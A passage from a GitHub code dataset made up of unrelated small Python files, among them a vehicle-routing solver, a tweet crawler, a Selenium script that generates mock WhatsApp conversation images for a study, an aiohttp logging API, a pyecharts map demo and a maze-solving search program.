pywrapcp.RoutingIndexManager(len(data['distance_matrix']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n # Create and register a transit callback.\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Add Distance constraint.\n dimension_name = 'Distance'\n routing.AddDimension(\n transit_callback_index,\n 0, # no slack\n MAX_DISTANCE, # vehicle maximum travel distance\n True, # start cumul to zero\n dimension_name)\n distance_dimension = routing.GetDimensionOrDie(dimension_name)\n distance_dimension.SetGlobalSpanCostCoefficient(100)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n search_parameters.local_search_metaheuristic = (routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)\n search_parameters.log_search = True\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Get timestamp for output file\n current_datetime = datetime.datetime.now()\n timestamp_str = current_datetime.strftime('%Y%m%d_%H%M%S')\n\n # Print solution on console.\n if solution:\n print_solution(data, manager, routing, solution)\n route_list, distance_list = save_to_table(data, manager, routing, solution)\n print(route_list, distance_list)\n route_output = f\"data/generated_route_list/route_list_{timestamp_str}.pkl\"\n distance_output = f\"data/generated_distance_list/distance_list_{timestamp_str}.pkl\"\n with open(route_output, 'wb') as f:\n pickle.dump(route_list, f)\n with open(distance_output, 'wb') as f:\n pickle.dump(distance_list, f)\n else:\n print('No solution found !')\n\n\nif __name__ == '__main__':\n main()","repo_name":"uchicago-dsi/Perpetual","sub_path":"alternate_routing_methods/vrp.py","file_name":"vrp.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4311229830","text":"import cv2\n\n\nclass PostProcessor(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, classifier):\n \"\"\"\n\n Args:\n classifier:\n \"\"\"\n self.classifier = classifier\n\n @staticmethod\n def arg_max(array):\n \"\"\"\n\n Args:\n array:\n\n Returns:\n\n \"\"\"\n index = [[0]]\n for j, img in enumerate(array):\n max_value = img[0]\n for i, el in enumerate(img):\n print(el)\n if el > max_value:\n index = i\n max_value = el\n return index\n\n def __call__(self, image, rectangles, predictions):\n \"\"\"\n\n Args:\n image:\n rectangles:\n predictions:\n \"\"\"\n emotions = []\n img_emotions = []\n for i, img in enumerate(predictions):\n for j in range(0, self.classifier.get_num_class()):\n img_emotions.append((self.classifier.get_string(j), ' = ', f'{img[i][j]:.3f}'))\n emotions.append(img_emotions)\n self.overlay(image, rectangles, emotions)\n\n @staticmethod\n def overlay(frame, rectangles, text, color=(48, 12, 160)):\n \"\"\"\n Draw rectangles and text over image\n\n Args:\n frame (Mat): Image\n rectangles (list): Coordinates of rectangles to draw\n text (list): List of emotions to write\n color (tuple): Box and text color\n \"\"\"\n j = 1\n for i, rectangle in enumerate(rectangles):\n cv2.rectangle(frame, (rectangle.left(), rectangle.top()), (rectangle.right(), rectangle.bottom()), color)\n for mTuple in text[i]:\n cv2.putText(frame, \"\".join(mTuple), (rectangle.right() + 10, rectangle.top() + j * 12),\n cv2.FONT_HERSHEY_DUPLEX, 0.2, color)\n j += 1\n return frame\n","repo_name":"SomeUserName1/Emopy","sub_path":"src/util/PostProcessor.py","file_name":"PostProcessor.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"21894907102","text":"\"\"\"Advent of code 2020 day 15. Part 2 takes about 20 seconds\"\"\"\n\nimport time\n\nexamples = [[0, 3, 6], [1, 3, 2], [2, 1, 3], [1, 2, 3], [2, 3, 1], [3, 2, 1], [3, 1, 2]]\nactual = [2, 0, 1, 9, 5, 19]\n\n\ndef find_last_spoken(starting_numbers, turns):\n last_turn_spoken = {\n number: (position + 1) for position, number in enumerate(starting_numbers)\n }\n turn = len(starting_numbers)\n last_number_spoken = starting_numbers[-1]\n while turn < turns:\n if last_number_spoken in last_turn_spoken:\n diff = turn - last_turn_spoken[last_number_spoken]\n last_turn_spoken[last_number_spoken] = turn\n last_number_spoken = diff\n else:\n last_turn_spoken[last_number_spoken] = turn\n last_number_spoken = 0\n turn = turn + 1\n return last_number_spoken\n\n\nfor example in examples:\n start = time.time()\n print(find_last_spoken(example, 2020))\n end = time.time()\n print(end - start)\n\n\nstart = time.time()\nprint(find_last_spoken(actual, 2020))\nend = time.time()\nprint(end - start)\n\n\nfor example in examples:\n start = time.time()\n print(find_last_spoken(example, 30000000))\n end = time.time()\n print(end - start)\n\n\nstart = time.time()\nprint(find_last_spoken(actual, 30000000))\nend = time.time()\nprint(end - start)","repo_name":"harumpher/Advent-of-code-2020","sub_path":"day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74456471907","text":"from django import template\nfrom django.template.defaultfilters import urlencode\n\n\nclass FacebookShareLinkCreatorNode(template.Node):\n url = 'https://www.facebook.com/sharer/sharer.php?u=%s&t=%s'\n\n def __init__(self, link, title):\n self.link = link[1:-1]\n self.title = title[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.link),\n urlencode(self.title)\n )\n\n\nclass TwitterShareLinkCreatorNode(template.Node):\n url = 'https://twitter.com/share?text=%s&url=%s&hashtags=%s'\n\n def __init__(self, text, link, hashtags):\n self.text = text[1:-1]\n self.link = link[1:-1]\n self.hashtags = hashtags[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.text),\n urlencode(self.link),\n self.hashtags\n )\n\n\nclass TelegramShareLinkCreatorNode(template.Node):\n url = 'https://telegram.me/share/url?url=%s&text=%s'\n\n def __init__(self, text, link):\n self.text = text[1:-1]\n self.link = link[1:-1]\n\n def render(self, context):\n return self.url % (\n urlencode(self.link),\n urlencode(self.text)\n )\n","repo_name":"roundium/django-handypackages","sub_path":"handypackages/utils/templatetags/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"70776791268","text":"from aiohttp import web\nfrom app.service import insert_log, get_logs\n\nroutes = web.RouteTableDef()\n\n@routes.view('/logs/list/')\nclass LogListView(web.View):\n\n async def post(self):\n pool = self.request.app['db']\n params = await self.request.json()\n data = {\n 'logs': await get_logs(pool, params)\n }\n \n return web.json_response(data)\n\n@routes.view('/logs/add/')\nclass LogAddView(web.View):\n\n async def is_valid(self, data):\n user_id = data.get('user_id', None)\n type = data.get('type', None)\n action = data.get('action', None)\n try:\n is_user_valid = int(str(user_id))\n except ValueError:\n is_user_valid = False\n\n return is_user_valid and type and action\n\n\n async def post(self):\n data = await self.request.json()\n pool = self.request.app['db']\n\n if not await self.is_valid(data):\n return web.json_response({'error': 'not enough params'}, status=400)\n\n log = {\n 'user_id': data.get('user_id'),\n 'email': data.get('email', ''),\n 'type': data.get('type'),\n 'action': data.get('action'),\n 'url': data.get('url', ''),\n }\n\n await insert_log(pool, log)\n\n return web.json_response({'log': log})","repo_name":"EduScaled/unti-log-api","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"32057280709","text":"import pandas as pd, os, time, base64, pysftp\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom dotenv import load_dotenv\n\nprint(\"This script will open an excel spreadsheet in the local Downloads folder, pull out the experiment data, \\\n and create an image of the conversation in WhatsApp \\\n based on an interaction via https://www.fakewhats.com/generator with Selenium. The image will then \\\n be uploaded to https://ryanchausse.com/aubrie_masters/images/conversation_pics/, where x is \\\n a unique composite key, probably '- _
', or somesuch.\")\n\n# Assigning env variables for SFTP url, username, and password based on ENV variables\nload_dotenv(dotenv_path='.env')\nsftp_domain = os.environ.get('SFTP_DOMAIN')\nsftp_dir = str(os.environ.get('SFTP_DIR'))\nlocal_dir = str(os.environ.get('LOCAL_DIR'))\nssh_login_name = os.environ.get('SSH_LOGIN_NAME')\npassword = os.environ.get('PASSWORD')\n\n# Read experimental data, print to terminal\ndf = pd.read_excel('~/Downloads/experiment_data_revised.xlsx', sheet_name='Sheet1', header=0, usecols=\"A:K\", nrows=64)\nprint(df)\n\n# Create sftp connection with host.\n\n# 1. Create unique filename in the format '- _
'\n# 2. Gather image using https://www.fakewhats.com/generator from Intro, Response 1, and Response2 columns\n# 3. Upload image to sftp://ryanchausse.com/aubrie_masters/images/\n\nfor index, row in df.iterrows():\n # Selenium to scrape the page, enter input data\n driver = webdriver.Firefox()\n driver.get('https://www.fakewhats.com/generator')\n time.sleep(1)\n wait_for_loading_div_gone = WebDriverWait(driver, timeout=10).until(\n ec.invisibility_of_element_located(\n (By.XPATH, '//a[contains(@class,\"loader\")]')\n )\n )\n print('Past loader visibility check for ' + str(row['Intro']))\n\n # Enter message text\n message_propername_element = driver.find_element_by_id(\"name\")\n # message_propername_element.send_keys(str(row['Proper.Name1']))\n driver.execute_script(\"document.getElementById('name').value='\" + str(row['Proper.Name1']) + \"'\")\n message_propername_element.send_keys(Keys.RETURN)\n time.sleep(1)\n message_link_element = driver.find_element_by_xpath('//a[contains(@href,\"#panel4\")]')\n message_link_element.click()\n time.sleep(1)\n\n message_textarea_element = driver.find_element_by_id(\"message-text\")\n message_textarea_element.send_keys(str(row['Intro']))\n message_add_to_conversation_element = driver.find_element_by_css_selector(\".sendMessage\")\n message_add_to_conversation_element.click()\n time.sleep(1)\n if row['Response1']:\n message_textarea_element.clear()\n switch_speaker_button_element = driver.find_element_by_css_selector(\"label[for='green-message']\")\n switch_speaker_button_element.click()\n time.sleep(1)\n message_textarea_element.send_keys(str(row['Response1']))\n if row['Response2'] is not None and str(row['Response2']) != 'nan':\n time.sleep(1)\n message_textarea_element.send_keys(' ' + str(row['Response2']))\n time.sleep(1)\n message_add_to_conversation_element.click()\n time.sleep(1)\n\n download_button_element = driver.find_element_by_css_selector(\"a.line-button-white\")\n download_button_element.click()\n time.sleep(4)\n\n # get the image source\n imgfilename = str(row['Item.n']) + \"_\" + str(row['list']) + '.png'\n print('imgfilename ' + imgfilename)\n imgsrc = driver.find_element_by_css_selector('img').get_attribute('src')\n imgdata = imgsrc.replace('data:image/png;base64,', '')\n\n # download\n with open(local_dir + '/' + imgfilename, 'wb') as fh:\n fh.write(base64.b64decode(imgdata))\n\n time.sleep(1)\n driver.close()\n driver.quit()\n time.sleep(1)\n # upload to remote server\n cnopts = pysftp.CnOpts(knownhosts='./known_hosts')\n with pysftp.Connection(sftp_domain, username=ssh_login_name, password=password, cnopts=cnopts) as sftp:\n sftp.put_r(local_dir, sftp_dir)\n\nprint(\"Done.\")\n","repo_name":"ryanchausse/aubrie_masters_ibex","sub_path":"whatsapperize.py","file_name":"whatsapperize.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39197622017","text":"#!/usr/bin/env python\nfrom os import makedirs\nfrom os.path import join, isfile\nfrom csv import DictWriter, DictReader\nfrom utils import ParallelMerge\nfrom snscrape.modules.twitter import TwitterSearchScraper\n\nhashtagfile = \"hashtags.txt\"\nexcludefile = \"exclude.txt\"\nread_exclude, write_exclude = True, True\noutputdir = \"mined-tweets\"\nlanguages = [\"en\", \"fr\", \"de\", \"ar\"]\ndates = [\"2020-03-01\", \"2021-09-01\"]\nregion = \"Europe\"\ncount = 30\n\ndef read_hashtags(filename):\n hashtags = list()\n with open(filename, \"rb\") as f:\n for line in f:\n hashtags.append(line.strip().decode())\n return hashtags\n\ndef write_tweets(tweets, filename, fieldnames=[\"id\", \"date\", \"country\", \"lang\", \"content\"]):\n with open(filename, \"w\", newline='', encoding='utf-8') as csv_file:\n writer = DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tweet in tweets:\n if not hasattr(tweet, \"country\"):\n try:\n tweet.country = tweet.place.country\n except AttributeError:\n tweet.country = \"None\"\n\n writer.writerow(dict(zip(fieldnames, [getattr(tweet, attr) for attr in fieldnames])))\n\ndef read_tweets(filename):\n with open(filename, newline='', encoding='utf-8') as csvfile:\n return list(DictReader(csvfile))\n\ndef read_excludefile(filename):\n ids = list()\n if isfile(filename):\n with open(filename, \"rb\") as f:\n for line in f:\n ids.append(int(line))\n return ids\n\ndef append_exclude(filename, ids):\n with open(filename, \"a+b\") as f:\n for id_ in ids:\n f.write(f\"{id_}\\n\".encode())\n\ndef crawl_tweets(hashtags, since=None, until=None):\n assert since is not None or until is not None\n makedirs(outputdir, exist_ok=True)\n\n since = f\"since:{since}\" if since else None\n until = f\"until:{until}\" if until else None\n langs = f\"({' OR '.join(f'lang:{lang}' for lang in languages)})\"\n near = f\"near:{region}\"\n filter_retweets = \"exclude:nativeretweets exclude:retweets\"\n\n filename = join(outputdir, \"-\".join(filter(None, [since, until])).replace(\":\", \"-\") + \".csv\")\n scrapers, tweets, unique_contents = list(), list(), set()\n exclude_ids = read_excludefile(excludefile) if read_exclude else list()\n\n for hashtag in hashtags:\n scrapers.append(TwitterSearchScraper(query=\" \".join(filter(None, [hashtag, since, until, langs, near, filter_retweets]))))\n\n try:\n with ParallelMerge(*[scraper.get_items() for scraper in scrapers]) as items:\n for tweet in items:\n if tweet.id not in exclude_ids and tweet.content not in unique_contents:\n tweets.append(tweet)\n unique_contents.add(tweet.content)\n print(f\"{len(tweets)} tweets mined in current run!\" , end='\\r')\n if len(tweets) >= count:\n break\n except KeyboardInterrupt:\n pass\n print()\n write_tweets(tweets, filename)\n if write_exclude:\n append_exclude(excludefile, [tweet.id for tweet in tweets])\n\n return tweets\n\nif __name__ == \"__main__\":\n hashtags = read_hashtags(hashtagfile)\n #print(\"Pre-pandemic tweets:\", len(crawl_tweets(hashtags, until=dates[0])))\n print(\"Pandemic tweets:\", len(crawl_tweets(hashtags, since=dates[0], until=dates[1])))\n","repo_name":"potamides/FOLT-Crawler","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22784514390","text":"# -*- coding: utf-8 -*\n\"\"\"\n2019-10-18\npyecharts 画图尝试\n\"\"\"\n\n# ========== 一个最基本的柱状图可视化 ==========\n# import pyecharts\n# from pyecharts.charts import Bar\n# from pyecharts import options as opts\n# # V1 版本开始支持链式调用\n# # 你所看到的格式其实是 `black` 格式化以后的效果\n# # 可以执行 `pip install black` 下载使用\n# # 不习惯链式调用的开发者依旧可以单独调用方法\n# bar = Bar()\n# bar.add_xaxis([\"衬衫\", \"羊毛衫\", \"雪纺衫\", \"裤子\", \"高跟鞋\", \"袜子\"])\n# bar.add_yaxis(\"商家A\", [5, 20, 36, 10, 75, 90])\n# bar.set_global_opts(title_opts=opts.TitleOpts(title=\"主标题\", subtitle=\"副标题\"))\n# html_file = 'bar_v2.html'\n# bar.render(html_file)\n\n# ========== 一个基本坐标系的可视乎 ==========\n# from pyecharts.faker import Collector, Faker\n# from pyecharts import options as opts\n# from pyecharts.charts import Geo\n# from pyecharts.globals import ChartType, SymbolType\n# def geo_base() -> Geo:\n# c = (\n# Geo()\n# .add_schema(maptype=\"海口\")\n# # .add(\"geo\", [list(z) for z in zip(Faker.provinces, Faker.values())])\n# .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n# .set_global_opts(\n# visualmap_opts=opts.VisualMapOpts(),\n# title_opts=opts.TitleOpts(title=\"Geo-基本示例\"),\n# )\n# )\n# c.add_coordinate(\"海南海口秀英秀英向荣\", 110.263727, 20.001732)\n# c.add_coordinate(\"海南海口龙华海垦海秀\", 110.328492, 20.031007)\n# c.add(\"geo\", [['海南海口秀英秀英向荣', 100], ['海南海口龙华海垦海秀', 50]])\n# return c\n\n# #可视化\n# geo = geo_base()\n# geo.render( 'haikou.html')\n\nBaidu_AK = \"nglMpYVKorG0aVPcom2BLWsemWbQ7P39\"\n# ========== 一个百度地图的尝试 ==========\nfrom pyecharts.charts import BMap\nfrom pyecharts.faker import Collector, Faker\nfrom pyecharts import options as opts\nimport os,json\nfrom pyecharts.globals import BMapType, ChartType\n\ndef bmap_heatmap() -> BMap:\n c = (\n BMap()\n .add_schema(baidu_ak=Baidu_AK, center=[110.3014600000, 20.0132350000], zoom=13) #缩放比例12-14之间可行\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"BMap-热力图\"),\n visualmap_opts=opts.VisualMapOpts(),\n )\n )\n # 增加坐标点\n c.add_coordinate(\"海南海口秀英秀英向荣\", 110.263727, 20.001732)\n c.add_coordinate(\"海南海口龙华海垦海秀\", 110.328492, 20.031007)\n\n # 增加坐标点之间的值\n c.add(\n \"bmap\",\n [['海南海口秀英秀英向荣', 100], ['海南海口龙华海垦海秀', 50]],\n type_=\"heatmap\",\n label_opts=opts.LabelOpts(formatter=\"{b}\"),\n )\n return c\n\n#可视化\ngeo = bmap_heatmap()\ngeo.render( 'china_bmap.html')","repo_name":"MYXue/CCF_2019_Haikou_traffic_analysis","sub_path":"codes/visualization/visualization_test.py","file_name":"visualization_test.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36601836650","text":"import logging\nfrom statistics import mean\nfrom typing import List\n\nfrom geojson import MultiLineString, Feature\n\nfrom .car import Car\n\nlogger = logging.getLogger(__name__)\n\n\nclass Points:\n def __init__(self, latitude, longitude):\n self.latitude = latitude\n self.longitude = longitude\n\n def list(self):\n return self.latitude, self.longitude\n\n\nclass Trip:\n def __init__(self):\n self.start_at = None\n self.end_at = None\n self.positions: List[Points] = []\n self.speed_average = None\n self.consumption = 0\n self.consumption_km = 0\n self.consumption_fuel = 0\n self.consumption_fuel_km = 0\n self.distance = None\n self.duration = None\n self.mileage = None\n self.car: Car = None\n self.altitude_diff = None\n self.temperatures = []\n self.id = None\n\n def add_points(self, latitude, longitude):\n self.positions.append(Points(latitude, longitude))\n\n def add_temperature(self, temp):\n self.temperatures.append(temp)\n\n def get_temperature(self):\n if len(self.temperatures) > 0:\n return float(mean(self.temperatures))\n return None\n\n def set_consumption(self, diff_level: float) -> float:\n if diff_level < 0:\n logger.debugv(\"trip has negative consumption\")\n diff_level = 0\n self.consumption = diff_level * self.car.battery_power / 100\n try:\n self.consumption_km = 100 * self.consumption / self.distance # kw/100 km\n except TypeError:\n raise ValueError(\"Distance not set\") from TypeError\n return self.consumption_km\n\n def set_fuel_consumption(self, consumption) -> float:\n if self.distance is None:\n raise ValueError(\"Distance not set\")\n if consumption < 0:\n logger.debugv(\"trip has negative fuel consumption\")\n self.consumption_fuel = round(consumption * self.car.fuel_capacity / 100, 2) # L\n self.consumption_fuel_km = round(100 * self.consumption_fuel / self.distance, 2) # L/100 km\n return self.consumption_fuel_km\n\n def to_geojson(self):\n multi_line_string = MultiLineString(tuple(map(list, self.positions)))\n return Feature(geometry=multi_line_string, properties={\"start_at\": self.start_at, \"end_at\": self.end_at,\n \"average speed\": self.speed_average,\n \"average consumption\": self.consumption_km,\n \"average consumption fuel\": self.consumption_fuel_km})\n\n def get_info(self):\n\n res = {\"consumption_km\": self.consumption_km, \"start_at\": self.start_at,\n \"consumption_by_temp\": self.get_temperature(), \"positions\": self.get_positions(),\n \"duration\": self.duration * 60, \"speed_average\": self.speed_average, \"distance\": self.distance,\n \"mileage\": self.mileage, \"altitude_diff\": self.altitude_diff, \"id\": self.id,\n \"consumption\": self.consumption\n }\n if self.car.has_battery():\n res[\"consumption_km\"] = self.consumption_km\n\n if self.car.has_fuel():\n res[\"consumption_fuel_km\"] = self.consumption_fuel_km\n\n return res\n\n def set_altitude_diff(self, start, end):\n try:\n self.altitude_diff = end - start\n except (NameError, TypeError):\n pass\n\n def get_positions(self):\n lat = []\n long = []\n for position in self.positions:\n lat.append(position.latitude)\n long.append(position.longitude)\n return {\"lat\": lat, \"long\": long}\n","repo_name":"flobz/psa_car_controller","sub_path":"psa_car_controller/psacc/model/trip.py","file_name":"trip.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"70"}
+{"seq_id":"32882935899","text":"'''\nStop a program from running:\n\n chalmers stop server1\n\nStopping a program will send a signal to the program. The signal can be set beforehand by:\n\n chalmers set server1 stopsignal=SIGTERM\n \nStop differs from off, off will not stop the program.\nWhen off a program will not be started at system boot (or `start --all`)\n\nWhen a program is *on* it will still start at system boot\neven if you manually stop it before a reboot.\n'''\n\nfrom __future__ import unicode_literals, print_function\n\nfrom argparse import RawDescriptionHelpFormatter\nimport logging\nimport sys\n\nfrom clyent import print_colors\n\nfrom chalmers import errors\nfrom chalmers.utils import cli\n\n\nlog = logging.getLogger('chalmers.stop')\n\ndef main(args):\n\n programs = cli.select_programs(args, filter_paused=False, force=args.force)\n\n programs = cli.filter_programs(programs, lambda p: not p.is_running, 'Stopping', 'stopped')\n if not programs:\n return\n for prog in programs:\n if prog.is_running:\n print(\"Stopping program %-25s ... \" % prog.name[:25], end=''); sys.stdout.flush()\n try:\n prog.stop(args.force)\n except errors.StateError as err:\n log.error(err.message)\n except errors.ConnectionError as err:\n print_colors(\"[ {=ERROR!c:red} ] %s (use --force to force stop the program)\" % err.message)\n else:\n print_colors(\"[ {=OK!c:green} ]\")\n else:\n print_colors(\"Program is already stopped: %-25s \" % prog.name[:25], \"[{=STOPPED!c:yello} ]\")\n\ndef pause_main(args):\n\n programs = cli.select_programs(args, filter_paused=False)\n programs = cli.filter_programs(programs, lambda p: p.is_paused, 'Pausing', 'paused')\n if not programs:\n return\n\n for prog in programs:\n log.info(\"Pausing program %s\" % (prog.name))\n if prog.is_running:\n log.warn(\"%s is running and will not restart on system reboot\" % (prog.name))\n\n prog.state.update(paused=True)\n\ndef unpause_main(args):\n\n programs = cli.select_programs(args, filter_paused=False)\n programs = cli.filter_programs(programs, lambda p: not p.is_paused, 'Unpausing', 'unpaused')\n\n if not programs:\n return\n\n for prog in programs:\n log.info(\"Unpausing program %s\" % (prog.name))\n prog.state.update(paused=False)\n if not prog.is_running:\n log.warning(\"%s is not running and will start on next system boot\" % (prog.name))\n\n\ndef add_parser(subparsers):\n parser = subparsers.add_parser('stop',\n help='Stop running a command',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n parser.add_argument('--force', action='store_true',\n help='Force kill a program (stopsignal will be ignored)'\n )\n\n parser.set_defaults(main=main)\n\n parser = subparsers.add_parser('off',\n help='Don\\'t run a program on system boot or `chalmers start --all`',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n\n parser.set_defaults(main=pause_main)\n\n parser = subparsers.add_parser('on',\n help='Run a program on system boot or `chalmers start --all`',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n\n parser.set_defaults(main=unpause_main)\n","repo_name":"Anaconda-Platform/chalmers","sub_path":"chalmers/commands/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"71"}
+{"seq_id":"14191013596","text":"import requests\r\nfrom random import randint\r\n\r\nurl = 'https://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain'\r\ndef get_names_list():\r\n usernames = requests.get(url)\r\n text = usernames.text\r\n # print(text)\r\n return text.split()\r\n\r\ndef get_random_word():\r\n name_list = get_names_list()\r\n random_number = randint(0,len(name_list))\r\n random_word = name_list[random_number]\r\n random_salt = randint(0,9999)\r\n print(random_word + str(random_number+random_salt))\r\n\r\nget_random_word()\r\n\r\n","repo_name":"aayushnig07/username_generator","sub_path":"Username_Generator/username_generator.py","file_name":"username_generator.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12597594604","text":"from flask import Flask, request, abort\nfrom flask_apscheduler import APScheduler\nfrom services import sleep_and_sum\n\nfrom src.serverless_manager.function_process.function_process_manager import FunctionProcessManager\n\napp = Flask(__name__)\nprocess_manager = FunctionProcessManager()\n\nservices = [sleep_and_sum]\nservices_map = {func.__name__: func for func in services}\nrequest_count = 0\n\n\n@app.route('/', methods=['GET'])\ndef run_serverless_service(service_name: str):\n service = services_map.get(service_name)\n if service is None:\n abort(404)\n answer = process_manager.run_function_on_endpoint(service, request.args)\n global request_count\n request_count += 1\n return answer\n\n\n@app.route('/active_processes', methods=['GET'])\ndef active_processes():\n return [process.pid for process in process_manager.function_processes]\n\n\n@app.route('/request_counter', methods=['GET'])\ndef request_counter():\n return str(request_count)\n\n\nif __name__ == \"__main__\":\n scheduler = APScheduler()\n scheduler.add_job(id=\"close_idle_processes\", func=process_manager.close_idle_processes, trigger='interval',\n seconds=2)\n scheduler.init_app(app)\n scheduler.start()\n app.run()\n","repo_name":"SagiShum/serverless_manager","sub_path":"src/serverless_manager/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7493903523","text":"import sys\n\nclass Node:\n def __init__(self,state,parent,action):\n self.distance = parent.distance+1 if parent is not None else 0\n self.state=state\n self.parent=parent\n self.action=action\n \nclass StackFrontier:\n def __init__(self):\n self.frontier =[]\n \n def add(self,node):\n self.frontier.append(node)\n def empty(self):\n return len(self.frontier)==0\n def contains_state(self, state):\n return any(state==node.state for node in self.frontier)\n def remove(self):\n node = self.frontier[-1]\n self.frontier=self.frontier[:-1]\n return node\nclass QueueFrontier(StackFrontier):\n def remove(self):\n node = self.frontier[0]\n self.frontier=self.frontier[1:]\n return node\nclass ListFrontier(StackFrontier):\n def remove(self,node):\n self.frontier.remove(node)\n def all(self):\n return self.frontier\nclass Maze:\n def __init__(self, filename):\n try:\n with open(filename,\"r\") as f:\n contents = f.read()\n contents = contents.splitlines()\n except:\n raise Exception(\"Unable to read file\")\n \n self.height = len(contents)\n self.width = max(len(line) for line in contents)\n self.contents=contents\n walls=[]\n for i in range(self.height):\n row=[]\n for j in range(self.width):\n try:\n if contents[i][j] == \"S\":\n self.start=(i,j)\n row.append(False)\n elif contents[i][j] == \"E\":\n self.goal=(i,j)\n row.append(False)\n elif contents[i][j]==\" \":\n row.append(False)\n else:\n row.append(True)\n except IndexError:\n row.append(False)\n walls.append(row)\n self.walls = walls\n self.solution = None\n if self.start is None:\n raise Exception(\"Maze must have exactly one starting point\")\n if self.goal is None:\n raise Exception(\"Maze must have exactly one goal point\")\n def neighbours (self,state):\n row,col= state\n candidates =[\n (\"up\",(row-1,col)),\n (\"down\",(row+1,col)),\n (\"left\",(row,col-1)),\n (\"right\",(row,col+1))\n ]\n actions=[]\n for action ,(r,c) in candidates:\n try:\n if not self.walls[r][c]:\n actions.append((action,(r,c)))\n except:\n continue\n return actions\n def print(self):\n solution = self.solution[1] if self.solution is not None else None\n for i,row in enumerate(self.walls):\n for j,col in enumerate(row):\n if col:\n print(\"█\",end=\"\")\n elif (i,j)==self.start:\n print('S',end=\"\")\n elif (i,j) == self.goal:\n print(\"E\",end=\"\")\n elif solution is not None and (i,j) in solution:\n print(\"*\",end=\"\")\n else:\n print(' ',end=\"\")\n print(\"\")\n print()\n \n def solve(self, algorithm):\n def h(state):\n x,y=self.goal\n a,b=state\n d = abs(x-a)+abs(y-b)\n return d\n \n def get_nearest_node():\n nodes = self.frontier.all()\n if algorithm == \"GFS\":\n distances = {node : h(node.state) for node in nodes}\n elif algorithm == \"KSS\":\n distances = {node : h(node.state)+node.distance for node in nodes}\n best_node = min(distances,key=lambda x: distances.get(x))\n self.frontier.remove(best_node)\n return best_node\n if algorithm==\"BFS\":\n self.frontier = QueueFrontier()\n elif algorithm==\"DFS\":\n self.frontier = StackFrontier()\n elif algorithm in [\"GFS\",\"KSS\"]:\n self.frontier = ListFrontier()\n else:\n raise Exception(\"Unknown algorithm {}. Either select BFS or DFS\".format(algorithm))\n node = Node(state=self.start,parent=None, action=None)\n self.num_explored = 0\n self.set_explored = set()\n self.frontier.add(node)\n while True:\n if self.frontier.empty():\n raise Exception (\"No Solution\")\n if algorithm in [\"DFS\",\"BFS\"]:\n node = self.frontier.remove()\n elif algorithm in [\"GFS\",\"KSS\"]:\n node = get_nearest_node()\n self.num_explored+=1 \n if node.state ==self.goal:\n actions = []\n cells = []\n while node.parent is not None:\n actions.append(node.action)\n cells.append(node.state)\n node=node.parent\n actions.reverse()\n cells.reverse()\n self.solution = (actions,cells)\n return\n self.set_explored.add(node.state)\n for action,state in self.neighbours(node.state):\n if state not in self.set_explored and not self.frontier.contains_state(state):\n child = Node(state,node,action)\n self.frontier.add(child)\n \ndef main():\n alg = {\"DFS\" : \"Depth First Search\",\"BFS\" : \"Breath First Search\",\"GFS\":\"Greedy First 